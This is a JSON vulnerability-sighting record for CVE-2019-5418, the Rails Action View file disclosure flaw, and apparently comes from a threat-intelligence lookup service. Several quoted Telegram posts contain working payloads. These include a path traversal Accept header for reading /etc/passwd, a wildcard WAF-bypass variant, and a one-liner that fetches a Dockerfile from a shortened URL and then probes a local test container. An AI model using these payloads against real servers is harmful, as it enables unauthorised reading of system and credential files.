{"vulnerability": "CVE-2019-5418", "sightings": [{"uuid": "4325507f-a15e-4c66-a563-cecbec35588d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "https://bsky.app/profile/sydnoir.bsky.social/post/3lg4urta4r52m", "content": "", "creation_timestamp": "2025-01-19T22:30:07.505994Z"}, {"uuid": "384f7494-4bbe-4f03-a0a2-0ccb2da4091b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:44.000000Z"}, {"uuid": "30af3fed-8df5-4158-ab1c-c441897d9eec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114813266893249320", "content": "", "creation_timestamp": "2025-07-07T18:03:41.907727Z"}, {"uuid": "7c5c9184-d2a3-4483-aa17-628a431cc081", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:16.000000Z"}, {"uuid": "6554a4bf-df21-4a56-86b9-4e00387afc27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lti75imyrv2q", "content": "", "creation_timestamp": "2025-07-08T21:02:33.689598Z"}, {"uuid": "40e41a1e-7e2e-4db6-864d-2e24f4e5bc32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/4361752", "content": "", "creation_timestamp": "2025-07-07T19:01:14.943664Z"}, {"uuid": "7a8d9c8b-d58d-47c0-83af-2d2f4b4cf6ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3ltfldvi3lm2e", "content": "", "creation_timestamp": "2025-07-07T20:02:45.942704Z"}, {"uuid": "a2eb6328-b5e7-4d1c-8750-a37189f4bf2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3ltflg2zsak2o", "content": "", "creation_timestamp": "2025-07-07T20:03:59.883103Z"}, {"uuid": "2175e3dc-c6c5-4cf0-b6ee-00c8f548420c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3ltfoohel5q2p", "content": "", "creation_timestamp": "2025-07-07T21:02:21.840200Z"}, {"uuid": "719d60cd-017f-4d51-9419-d07f68ab744f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-09-28T08:23:30.000000Z"}, {"uuid": "15f7a34b-6d2a-4054-941d-807298650dd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lu6gg2ccxj2q", "content": "", "creation_timestamp": "2025-07-17T17:11:02.313240Z"}, {"uuid": "fd12e4a4-bd2e-4116-875b-284d4209cae1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3lu6gg5iynbs2", "content": "", "creation_timestamp": "2025-07-17T17:11:11.102597Z"}, {"uuid": "3f4edeae-eda7-4f18-a256-4ddb04645e47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lu6gge6os72z", "content": "", "creation_timestamp": "2025-07-17T17:11:12.445932Z"}, {"uuid": "a427e137-1e61-47f1-bb49-dcd01878c7b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-09-29T03:12:13.000000Z"}, {"uuid": "affe0a7e-9ba2-4bf6-83f4-5f3a10719384", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "published-proof-of-concept", "source": "https://t.me/antichat/4104", "content": "Analysis for\u3010CVE-2019-5418\u3011File Content Disclosure on Rails\nhttps://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/", "creation_timestamp": "2019-03-22T17:48:55.000000Z"}, {"uuid": "6f5cdb83-99ba-445a-b003-5c17cf7691be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/rails_doubletap_file_read.rb", "content": "", "creation_timestamp": "2019-04-19T18:01:04.000000Z"}, {"uuid": "21a9d953-5983-4720-8876-1ac897300a05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2019-5418", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/5938e268-3154-438e-8838-ec14bac2155f", "content": "", "creation_timestamp": "2026-02-02T12:25:57.628706Z"}, {"uuid": "8207ac3d-e267-4299-acf1-efcc7f47d44d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "published-proof-of-concept", "source": "https://t.me/antichat/4314", "content": "CVE-2019\u20135418: on WAF bypass and caching\nhttps://blog.pentesterlab.com/cve-2019-5418-on-waf-bypass-and-caching-10e93f9a1981", "creation_timestamp": "2019-04-04T16:56:58.000000Z"}, {"uuid": "b9551767-6575-4ff3-b6c3-16e17218216b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "published-proof-of-concept", "source": "https://t.me/antichat/4048", "content": "Ruby on Rails CVE-2019-5418 tweet-PoC\n\ncurl -sL https://goo.gl/NFR6fJ  &gt; /tmp/NFR6fJ; docker build -f /tmp/NFR6fJ -t 2019-5418 .; docker run -d --name 2019-5418 -p3000:3000 2019-5418; sleep 4; curl -H 'Accept: ../../../../../../../../etc/passwd{{' 'http://localhost:3000/robots';\n\nhttps://twitter.com/Menin_TheMiddle/status/1107742400896819202", "creation_timestamp": "2019-03-19T10:46:25.000000Z"}, {"uuid": "af76ad7d-38fb-4e6b-bebc-7e365d54b359", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "published-proof-of-concept", "source": "https://t.me/antichat/4241", "content": "Ruby on Rails CVE-2019-5418 tweet-PoC\n\ncurl -sL goo.gl/NFR6fJ &gt; /tmp/NFR6fJ; docker build -f /tmp/NFR6fJ -t 2019-5418 .; docker run -d --name 2019-5418 -p3000:3000 2019-5418; sleep 4; curl -H 'Accept: ../../../../../../../../etc/passwd{{' 'http://localhost:3000/robots';", "creation_timestamp": "2019-03-30T14:51:44.000000Z"}, {"uuid": "9029c7b5-55d8-48f7-9bc1-0e24acbd96f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "published-proof-of-concept", "source": "https://t.me/antichat/4013", "content": "Analysis for\u3010CVE-2019-5418\u3011File Content Disclosure on Rails\nhttp://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/", "creation_timestamp": "2019-03-16T08:53:20.000000Z"}, {"uuid": "69e533a9-d4c4-4c0e-a110-e3627bfe5daa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "published-proof-of-concept", "source": "https://t.me/cybersecplayground/57", "content": "If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.\n\nIntercept the request in Burp and replace the Accept header with: \n`Accept: ../../../../../../../../../../etc/passwd{{` \n#bugbountytips", "creation_timestamp": "2025-01-23T08:50:12.000000Z"}, {"uuid": "81a0eaf5-37d5-4896-ac8a-45bee0bd0ac8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "published-proof-of-concept", "source": "Telegram/qBahjGhadtLT-XcqPwLzecmAwtnkL3Nh8hSmwnXHcFJUbBg", "content": "", "creation_timestamp": "2025-04-07T23:00:05.000000Z"}, {"uuid": "3afc6f23-c513-4adf-a6ae-f5d3fbbfeae3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "exploited", "source": "https://t.me/canyoupwnme/5279", "content": "Ruby on Rails CVE-2019-5418 tweet-PoC\n\ncurl -sL https://goo.gl/NFR6fJ  &gt; /tmp/NFR6fJ; docker build -f /tmp/NFR6fJ -t 2019-5418 .; docker run -d --name 2019-5418 -p3000:3000 2019-5418; sleep 4; curl -H 'Accept: ../../../../../../../../etc/passwd{{' 'http://localhost:3000/robots';\n\nhttps://twitter.com/Menin_TheMiddle/status/1107742400896819202", "creation_timestamp": "2019-03-19T11:45:59.000000Z"}, {"uuid": "6d284c7a-69ea-479f-aa36-633d648111e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "published-proof-of-concept", "source": "Telegram/3tkzDR_deFQ6hUZ0C83oB2tbfo78eBa7q3RkU-LLqvl69iM", "content": "", "creation_timestamp": "2025-01-23T09:50:18.000000Z"}, {"uuid": "6d331ba8-e5c5-4807-9cf1-21d3c184903e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "published-proof-of-concept", "source": "https://t.me/canyoupwnme/5303", "content": "Analysis for\u3010CVE-2019-5418\u3011File Content Disclosure on Rails\nhttps://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/", "creation_timestamp": "2019-03-22T11:49:26.000000Z"}, {"uuid": "e0027e79-e3ac-45fb-b7c4-c7a64d40ddf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "published-proof-of-concept", "source": "https://t.me/canyoupwnme/5371", "content": "CVE-2019\u20135418: on WAF bypass and caching\nhttps://blog.pentesterlab.com/cve-2019-5418-on-waf-bypass-and-caching-10e93f9a1981", "creation_timestamp": "2019-04-04T12:08:36.000000Z"}, {"uuid": "840826d3-dd82-42cc-a82b-648781258fef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/2416", "content": "Analysis for\u3010CVE-2019-5418\u3011File Content Disclosure on Rails\nhttp://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/", "creation_timestamp": "2019-03-16T09:52:54.000000Z"}, {"uuid": "086d977e-a42d-4012-b83d-10c766fbee1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/2446", "content": "RCE on Rails 5.2.2 using a path traversal (CVE-2019-5418) and a deserialization of Ruby objects (CVE-2019-5420)\n\nhttps://github.com/mpgn/Rails-doubletap-RCE", "creation_timestamp": "2019-03-24T00:55:47.000000Z"}, {"uuid": "644141d4-c034-4103-bf9e-7e1480a4a31c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "published-proof-of-concept", "source": "https://t.me/VulnerabilityNews/5631", "content": "#0daytoday #Rails 5.2.1 - Arbitrary File Content Disclosure Exploit CVE-2019-5418 [webapps #exploits #0day #Exploit]\nRead More", "creation_timestamp": "2019-03-24T13:37:18.000000Z"}, {"uuid": "ea7152b3-137b-4ec9-8f10-32a823d80d3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "exploited", "source": "https://t.me/suboxone_chatroom/5362", "content": "\u26a0\ufe0fIf your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.\n\nIntercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{ \n\n\ud83d\udecdIf the server is deemed to be vulnerable, but a WAF is present: \n\n../../../../../../e*c/p*s*d{{\n\n\u2714\ufe0fCredit- nav1n0x", "creation_timestamp": "2025-03-12T14:51:51.000000Z"}, {"uuid": "611f9f2d-15ed-4965-87cc-41fcc703347d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "exploited", "source": "https://t.me/suboxone_chatroom/4315", "content": "\u26a0\ufe0fIf your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.\n\nIntercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{ \n\n\ud83d\udecdIf the server is deemed to be vulnerable, but a WAF is present: \n\n../../../../../../e*c/p*s*d{{\n\n\u2714\ufe0fCredit- nav1n0x", "creation_timestamp": "2025-02-28T08:22:28.000000Z"}]}